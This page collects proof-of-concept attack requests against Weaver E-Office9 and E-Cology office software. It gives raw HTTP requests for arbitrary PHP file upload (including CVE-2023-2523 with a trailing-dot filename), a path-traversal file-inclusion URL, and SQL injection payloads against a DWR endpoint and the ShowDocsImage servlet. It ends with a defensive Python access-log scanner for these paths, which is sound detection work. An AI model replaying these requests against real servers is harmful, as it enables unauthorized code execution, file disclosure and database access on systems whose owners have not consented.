Weaver (泛微)

E-Office9 arbitrary file upload

Weaver E-Office9 contains a code-issue vulnerability that stems from the file /inc/jquery/uploadify/uploadify.php: its handling of the Filedata parameter allows unrestricted upload.

Weaver E-Office9.0 POC or EXP

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.232.137:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--

Weaver E-Office9 front-end file inclusion POC

http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls

Weaver E-Office9 file upload vulnerability CVE-2023-2523 POC

POST /Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: 192.168.233.10:8082
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

E-Cology (certain version) SQL injection vulnerability POC

POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip

callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrUtil
c0-methodName=ifNewsCheckOutByCurrentUser
c0-id=0
c0-param0=string:1 AND 1=1
c0-param1=string:1
batchId=0

Weaver ShowDocsImage SQL injection vulnerability

GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) 5bGx5rW35LmL5YWz
Accept-Encoding: gzip, deflate
Connection: close
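
For defenders, the request paths listed on this page can be turned into an access-log check. The following is an added example, not part of the original page or of any Weaver code: it assumes combined-format access logs, the label names are hypothetical, and treating a non-numeric docId as suspicious is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify(method, target):
    """Label a request that matches one of the endpoints on this page, else None."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    query = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded
    if method == "POST" and path == "/inc/jquery/uploadify/uploadify.php":
        return "eoffice-uploadify-post"
    if path == "/e-mobile/app/init.php" and any(".." in v for v in query.get("m", [])):
        return "eoffice-init-traversal"
    # endswith() covers both the "Emobile" and "E-mobile" spellings of the directory.
    if (method == "POST" and path.endswith("/app/ajax/ajax.php")
            and "mobile_upload_save" in query.get("action", [])):
        return "eoffice-mobile-upload-save"
    if method == "POST" and path.endswith("/cptdwrutil.ifnewscheckoutbycurrentuser.dwr"):
        return "ecology-dwr-ifnewscheckout"
    if path == "/weaver/weaver.docs.docs.showdocsimageservlet":
        # Assumption: a legitimate docId is purely numeric.
        if any(not v.isdigit() for v in query.get("docId", [])):
            return "ecology-showdocsimage-docid"
    return None

def scan(lines):
    """Return (client, label, target) for every log line that matches."""
    hits = []
    for line in lines:
        m = REQ.search(line)
        if m and (label := classify(m["method"], m["target"])):
            hits.append((line.split()[0], label, m["target"]))
    return hits

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "POST /inc/jquery/uploadify/uploadify.php HTTP/1.1" 200 12',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /E-mobile/App/Init.php?weiApi=1&m=1_..%2F..%2Fattachment%2Fx.xls HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%20AND%201=1 HTTP/1.1" 200 0',
    '198.51.100.9 - - [01/Jan/2024:10:02:05 +0000] "GET /index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, label, target in scan(SAMPLE_LOG):
        print(client, label, target)
```

A hit on the uploadify or mobile_upload_save paths is a prompt to check the upload directory for newly written .php files, since the log line alone does not show the uploaded filename.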
